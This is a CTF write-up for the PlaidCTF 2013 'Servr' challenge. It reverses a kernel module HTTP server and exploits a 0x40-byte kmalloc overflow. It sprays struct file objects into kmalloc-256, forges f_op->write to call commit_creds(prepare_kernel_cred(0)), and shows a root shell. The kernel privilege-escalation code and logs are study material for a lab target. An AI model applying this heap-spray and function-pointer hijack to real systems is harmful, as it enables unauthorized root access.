PlaidCTF 2013 > Servr - pwn 400
When someone told me to go check this "web" chall out, I was rather surprised, but I gave it a shot. The challenge was presented with this archive containing a qemu-ready Linux system. The system boots perfectly fine and we get what looks like an LKM, servr.ko, in /home/servr. At this point I extract the content of the root fs:
$ tar -jxvf servr.tar.bz2
$ mkdir rootfs && cd rootfs
$ gzip -dcS .img ../servr/initramfs.img | cpio -id
3804 blocs
$ ls
bin dev etc home init proc root sys tmp var
$ file home/servr/servr.ko
home/servr/servr.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), [...], not stripped
$
So we do indeed have an x64 LKM to reverse. I guess I should take a look at web challenges more often :)
As the module is not stripped, it is not nearly as painful as it could be. servr_init contains a kernel server socket initialization:
void servr_init()
{
    workqueue = __alloc_workqueue_key("servr", 1, 0, 0);
    free_workqueue = __alloc_workqueue_key("servr_free", 1, 0, 0);

    sock_create_kern(2, 1, 6, &server_sock);  /* AF_INET, SOCK_STREAM, IPPROTO_TCP */

    memset(&var_20, 0, 0x10);                 /* 0x10-byte sockaddr */
    var_20 = 2;                               /* family: AF_INET */
    var_1E = 0x5000;                          /* port, 16-bit word */
    kernel_bind(server_sock, &var_20, 0x10);
    kernel_listen(server_sock, 10);

    spin_lock_bh(&server_sock->sk_lock.slock);
    server_sock->sk_data_ready = server_sock_data_ready;
    spin_unlock_bh(&server_sock->sk_lock.slock);

    printk("Module loaded\n");
}
The main information we get here is that the socket is TCP (IP + SOCK_STREAM), listening on port 80 (the 16-bit word 0x5000 is stored little-endian as the bytes 00 50, which reads as 0x0050 = 80 in network byte order), and that its data-ready callback is server_sock_data_ready. This next function does little more than wake up the servr workqueue for the accept_connection job, handled by accept_connection_cb. That callback calls kernel_accept and installs callbacks on each newly accepted client socket. These follow the same pattern: client_sock_data_ready hands off to client_work_cb().
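The port decoding above can be checked with a couple of lines of C. This is only a sketch: `swap16` and `port_from_stored_word` are hypothetical helper names, and it assumes that var_1E is the port field of a standard IPv4 socket address, as the bind call suggests.

```c
#include <stdint.h>

/* Swap the two bytes of a 16-bit value (what htons() does on a
 * little-endian host such as x86-64). */
static uint16_t swap16(uint16_t v)
{
    return (uint16_t)((v << 8) | (v >> 8));
}

/* Hypothetical helper: recover the TCP port from the 16-bit word the
 * module stores at var_1E (assumed to be the sockaddr port field). */
static uint16_t port_from_stored_word(uint16_t stored)
{
    return swap16(stored);
}
```

Calling `port_from_stored_word(0x5000)` gives 80, and `swap16(80)` gives back 0x5000, the constant seen in the decompiled code.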
This function is much longer, so I won't go through it in detail. What matters is how it records the request body and its length:
The body of the request (everything after "\r\n\r\n") is pointed to by *(r15 + 0x68) = *(rbx + 0x60). The Content-Length header, if present, is parsed into the field at r15 + 0x70 = rbx + 0x68, whose address is kept in [rbp + var_B0]:
loc_A3C:
    mov     [r11+10h], r14
    mov     [r11+18h], r13
    mov     rdi, offset aContentLength
    mov     rsi, r14
    mov     ecx, 0Fh
    repe cmpsb
    jz      loc_B20
loc_B20:
    mov     rdx, [rbp+var_B0]
    mov     esi, 0Ah
    mov     rdi, r13
    mov     [rbp+var_B8], r11
    call    kstrtoll
    test    eax, eax
    mov     r11, [rbp+var_B8]
    jz      loc_A5B
    mov     qword ptr [r15+70h], 0
    jmp     loc_A5B
[...]
loc_A7C:
    mov     rax, [rbx+68h]
    cmp     rax, 1000h
    ja      short send_error
So this field cannot exceed 0x1000. Next comes finish_handle_request, which takes r15 as its only argument:
loc_593:
    mov     rdi, [rdi+70h]
    test    rdi, rdi
    jz      loc_660                 // clength == 0
    mov     [rbx+80h], rdi
    mov     esi, 80D0h
    call    __kmalloc               // kmalloc(clength)
    test    rax, rax
    mov     [rbx+78h], rax
    jz      loc_660
    mov     r8, 0D4B4F2030303220h   // HTTP response headers
    mov     r9, 3A7265767265530Ah
    mov     r10, 312F727672657320h
    mov     r11, 746E6F430A0D302Eh
    mov     rcx, 702F74786574203Ah
    mov     rdi, 312E312F50545448h
    mov     rdx, 657079742D746E65h
    mov     rsi, 0A0D0A0D6E69616Ch
    mov     byte ptr [rbx+90h], 1
    mov     [rax+8], r8
    mov     [rax+10h], r9
    mov     [rax+18h], r10
    mov     [rax+20h], r11
    mov     [rax+30h], rcx
    mov     [rax], rdi
    mov     [rax+28h], rdx
    mov     [rax+38h], rsi
    mov     byte ptr [rax+40h], 0
    mov     rdi, [rbx+78h]
    mov     rsi, [rbx+68h]          ; src
    mov     rdx, [rbx+70h]          ; n
    add     rdi, 40h                ; dest
    call    memcpy
The function kmallocs a buffer the size of the body (the Content-Length value), writes the 0x40 bytes of HTTP response headers at its start, and then memcpys the original request body right after them. The total written is therefore 0x40 + Content-Length bytes, whereas only Content-Length bytes were allocated. This is a classic kmalloc() overflow, as the hints suggested.
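To double-check the 0x40 figure, the eight immediates from the listing can be reassembled into the header text. The sketch below does that and also computes how far a write runs past a slab slot; `build_header` and `overflow_past_slot` are hypothetical names, and the slot size is an input here, not something read from the kernel.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define HDR_LEN 0x40  /* bytes written before the body is appended */

/* Immediates from the listing, ordered by destination offset
 * ([rax], [rax+8], ..., [rax+38h]). */
static const uint64_t hdr_words[8] = {
    0x312E312F50545448ULL, 0x0D4B4F2030303220ULL,
    0x3A7265767265530AULL, 0x312F727672657320ULL,
    0x746E6F430A0D302EULL, 0x657079742D746E65ULL,
    0x702F74786574203AULL, 0x0A0D0A0D6E69616CULL,
};

/* Rebuild the header text; out must hold HDR_LEN + 1 bytes. Bytes are
 * extracted explicitly so the result does not depend on host endianness. */
static void build_header(char *out)
{
    for (size_t w = 0; w < 8; w++)
        for (size_t b = 0; b < 8; b++)
            out[w * 8 + b] = (char)((hdr_words[w] >> (8 * b)) & 0xff);
    out[HDR_LEN] = '\0';  /* mirrors "mov byte ptr [rax+40h], 0" */
}

/* Bytes written past the end of a slot of slot_size bytes when the
 * module handles a body of clength bytes (0 if everything fits). */
static size_t overflow_past_slot(size_t clength, size_t slot_size)
{
    size_t written = HDR_LEN + clength;  /* header + memcpy'd body */
    return written > slot_size ? written - slot_size : 0;
}
```

`build_header` yields "HTTP/1.1 200 OK\r\nServer: servr/1.0\r\nContent-type: text/plain\r\n\r\n", which is exactly 64 bytes. When the body length equals the slot size, the whole 0x40 bytes spill into the next object; a shorter body in the same slot overflows by less.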
To optimize allocations, the kernel pre-allocates pages (slabs) holding several chunks of the same size, either for well-known kernel objects such as inodes or task_struct, or for general-purpose allocations (kmalloc-32, kmalloc-96, kmalloc-1024, ...). To get more details on Linux kernel allocators, check out this article. What is nice in this case is that we control the length, so we can choose which slab kmalloc will allocate from. The downside is that the overflow is only 0x40 bytes, which isn't a whole lot.
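As a rough illustration of how a requested length picks a general-purpose cache, here is a small lookup. The size table is an assumption (a typical set of kmalloc caches on x86-64); the authoritative list for a given kernel is whatever /proc/slabinfo shows, and `kmalloc_cache_for` is a hypothetical helper, not a kernel function.

```c
#include <stddef.h>

/* Assumed general-purpose cache sizes (typical on x86-64; check
 * /proc/slabinfo on the target for the real list). */
static const size_t kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Return the object size of the smallest cache that fits `size`,
 * or 0 if the request is larger than every cache in the table. */
static size_t kmalloc_cache_for(size_t size)
{
    size_t n = sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]);

    for (size_t i = 0; i < n; i++)
        if (size <= kmalloc_sizes[i])
            return kmalloc_sizes[i];
    return 0;
}
```

Under these assumptions a Content-Length of 256 lands in kmalloc-256 and fills its slot completely, while 257 would already move to kmalloc-512.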
The goal in a kmalloc overflow is to get a well-known kernel object allocated right after the overflowed one. We spray the slab used by a particular kernel object by requesting lots of allocations from userspace, then release one of them so that the kernel kfree()s it. We then allocate a chunk of the same size, which should land in the slot of the freed object, just before one of the other sprayed objects. If that object contains a function pointer, or a pointer that is dereferenced to write data, in a kernel path we can trigger from userspace, we can execute code in ring0.
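The spray, free, reclaim sequence can be modelled in userspace with a toy allocator. This is a deliberately simplified sketch, assuming a single slab whose free slots are reused in last-freed-first order; it is not how the kernel allocator is implemented, and all names are hypothetical.

```c
#include <stddef.h>

#define SLOTS 8

/* Toy slab: fixed-size slots plus a LIFO stack of free slot indices. */
struct toy_slab {
    int free_stack[SLOTS];
    int free_top;          /* number of entries in free_stack */
};

static void slab_init(struct toy_slab *s)
{
    /* Push indices in reverse so slot 0 is handed out first. */
    s->free_top = 0;
    for (int i = SLOTS - 1; i >= 0; i--)
        s->free_stack[s->free_top++] = i;
}

/* Pop the most recently freed slot, or -1 if the slab is full. */
static int slab_alloc(struct toy_slab *s)
{
    return s->free_top > 0 ? s->free_stack[--s->free_top] : -1;
}

static void slab_free(struct toy_slab *s, int slot)
{
    s->free_stack[s->free_top++] = slot;
}

/* Spray every slot, free `hole`, then allocate once more.
 * Returns the slot the new allocation lands in. */
static int spray_and_reclaim(struct toy_slab *s, int hole)
{
    slab_init(s);
    while (slab_alloc(s) >= 0)
        ;                    /* spray: fill every slot */
    slab_free(s, hole);      /* punch one hole */
    return slab_alloc(s);    /* attacker-sized allocation */
}
```

In this model `spray_and_reclaim(&s, 3)` returns 3, so the new chunk sits directly before the still-allocated object in slot 4. It also shows why an unrelated allocation made between the free and the reclaim would take the hole first.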
A nice struct to overwrite is struct file, as it contains f_op, a pointer to a struct of function pointers. So the idea is to create a lot of files, find out in which slab the structs are allocated, and perform the overflow in that one: exactly what I didn't do during the actual CTF, as I was sure that struct file ought to be in kmalloc-128 - gg no re. We can change the init file to set uid=0 so that we can read /proc/slabinfo (repack the initramfs by running find . | cpio --create --format='newc' > /tmp/initramfs.img at its root, then gzip the result).
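#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void check_slabs(void); /* prints /proc/slabinfo counters; not shown here */

int main()
{
    int i;
    int *files;
    char tmpfile[100];

    files = malloc(sizeof(int));
    check_slabs();

    /* Spray slab with file structs */
    for (i = 0;; i++) {
        sprintf(tmpfile, "/tmp/tmpfile%d", i);
        files = realloc(files, (i + 1) * sizeof(int));
        /* O_CREAT requires an explicit mode argument */
        if ((files[i] = open(tmpfile, O_RDWR | O_CREAT | O_SYNC, 0600)) < 0)
            break;
    }
    printf("[+] Created %d files\n", i);

    close(files[0]);
    check_slabs();
    return 0;
}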
We close one file descriptor or else we cannot open /proc/slabinfo. We can see several differences between the two slab checks:
# /home/servr/test
# name <active_objs> [...]
inode_cache 3276
dentry 3276
kmalloc-256 448
kmalloc-16 2560
[+] Created 1021 files
# name <active_objs> [...]
inode_cache 4298
dentry 4305
kmalloc-256 1456
kmalloc-16 3584
/ #
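The check_slabs() helper is not shown in this post. A minimal sketch of the parsing it would need, assuming the usual /proc/slabinfo layout where each data line starts with the cache name followed by the active object count, could look like this (`parse_slabinfo_line` is a hypothetical name):

```c
#include <stdio.h>

/* Parse one /proc/slabinfo data line ("name active_objs num_objs ...").
 * Returns 1 and fills name/active on success, 0 for the column header
 * or a malformed line. `name` must hold at least 64 bytes. */
static int parse_slabinfo_line(const char *line, char *name,
                               unsigned long *active)
{
    if (line[0] == '#')
        return 0;  /* "# name <active_objs> ..." column header */
    return sscanf(line, "%63s %lu", name, active) == 2;
}
```

Running this over every line before and after the spray, and printing only the caches whose count changed, gives a diff like the one above.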
As expected, the number of inodes, dentries, etc. goes up, along with two kmalloc slabs. kmalloc-16 is too small to hold a struct file, so it has to be kmalloc-256. Knowing this, we allocate a large number of files, close one of them, trigger the overflow, and issue a write on every remaining file. If one of their struct file objects has been overwritten, the system should crash. Actually, trying that, nothing happens. This may be because other objects get allocated in this slab before the targeted kmalloc happens, so we need to close more files. Nothing for 2 files either, let's try 3:
/ $ /home/servr/test 3
[+] Created 1021 files
[+] Payload sent (296 bytes)
[ 10.025136] general protection fault: 0000 [#1] SMP
[ 10.025136] Modules linked in: servr(O)
[ 10.025136] CPU 0
[ 10.025136] Pid: 840, comm: test Tainted: G O 3.8.7 #35 Bochs Bochs
[ 10.025136] RIP: 0010:[<ffffffff8112dd12>] [<ffffffff8112dd12>] vfs_write+0x32/0x180
[ 10.025136] RSP: 0018:ffff880002faff08 EFLAGS: 00000206
[ 10.025136] RAX: 4141414141414141 RBX: ffff880002832900 RCX: ffff880002faff50
[...]
[ 10.025136] [<ffffffff8112e0bd>] sys_write+0x4d/0x90
[ 10.025136] [<ffffffff8178c052>] system_call_fastpath+0x16/0x1b
[...]
This works. Now we just have to craft our fake struct file data so that it passes the various checks in vfs_write and some of its callees, such as rw_verify_area. Those functions are not very long, so this is fairly easy:
void setup_file(char * file)
{
    *(char **)(file + 0x18) = dentry_addr;
    *(char **)(dentry_addr + 0x30) = inode_addr;
    *(char **)(inode_addr + 0x38) = i_security_addr;
    *(char **)(inode_addr + 0x138) = 0; //inode->flock
    *(char **)(file + 0x20) = f_op_addr;
    *(char **)(f_op_addr + 0x18) = write_addr;
    *(char **)(f_op_addr + 0x28) = aio_write_addr;
    *(file + 0x3c) = 2; // FMODE_WRITE
    *(file + 0x3f) = 1; // FMODE_NOTIFY
    *(char **)(file + 0x40) = 0; // pos
}
All those addresses are arbitrary addresses that have to be valid. Because we are directly switching from userland to kernel space with a write syscall, our process' address space is still valid during kernel code execution. The pointer to be executed is f_op->write, so we have write_addr pointing to a basic kernel exploit code:
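One way to make such arbitrary addresses valid is to map anonymous memory at fixed locations in the exploit process. The post does not say how the addresses were backed, so treat this as an assumption; `map_fake_object` is a hypothetical helper and the address in the usage note is just an example value.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE  /* for MAP_ANONYMOUS under strict C standards */
#endif
#include <stddef.h>
#include <sys/mman.h>

/* Map `len` zeroed, read/write bytes at the fixed, page-aligned user
 * address `addr`. Returns the mapping address or NULL on failure.
 * MAP_FIXED replaces anything already mapped there, so pick an
 * address the process is not using. */
static void *map_fake_object(unsigned long addr, size_t len)
{
    void *p = mmap((void *)addr, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);

    return p == MAP_FAILED ? NULL : p;
}
```

For instance, `map_fake_object(0x10000000UL, 0x1000)` would back a fake dentry placed at 0x10000000. Plain static buffers in the exploit binary would work just as well, since all that matters is that the pointers land in mapped userland memory.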
int __attribute__((regparm(3))) leetbbq()
{
    commit_creds(prepare_kernel_cred(0));
    return 0; // avoid fsnotify
}

The full exploit code is available here:
/ $ /home/servr/sploit 3
[+] Looking up kernel symbols...
[+] Resolved symbol commit_creds to 0xffffffff81063250
[+] Resolved symbol prepare_kernel_cred to 0xffffffff81063510
[+] Created 1021 files
[+] Payload sent (296 bytes)
[+] Launching root shell!
/ # id
uid=0(root) gid=0(root)
/ #
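The symbol lookup step in the output above is not detailed in this post. A common approach, assumed here, is to scan /proc/kallsyms, whose lines have the form "address type name"; on systems that restrict kernel pointers the addresses read as zero and this will not work. `match_ksym` and `lookup_ksym` are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Parse one kallsyms-style line: "<hex addr> <type> <name>".
 * Returns the address if the symbol name equals `wanted`, else 0. */
static unsigned long match_ksym(const char *line, const char *wanted)
{
    unsigned long addr;
    char type;
    char name[128];

    if (sscanf(line, "%lx %c %127s", &addr, &type, name) != 3)
        return 0;
    return strcmp(name, wanted) == 0 ? addr : 0;
}

/* Scan an open symbol listing for `wanted`; returns 0 if not found. */
static unsigned long lookup_ksym(FILE *f, const char *wanted)
{
    char line[256];
    unsigned long addr;

    while (fgets(line, sizeof line, f))
        if ((addr = match_ksym(line, wanted)) != 0)
            return addr;
    return 0;
}
```

With `FILE *f = fopen("/proc/kallsyms", "r")`, the result of `lookup_ksym(f, "commit_creds")` can be cast to a function pointer and used by the payload function, which is called while the process address space is still mapped.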
A shame that I was blindly overflowing into kmalloc-128 the whole Sunday for some reason... Great CTF challenge, PPP delivers yet again.
You can either echo -en the hex version of your executable, or base64 encode it for instance. I'll update the article with that next week.
Excellent post. Could you please give the steps to compile/port the code to qemu image?
Thanks.
Excellent article !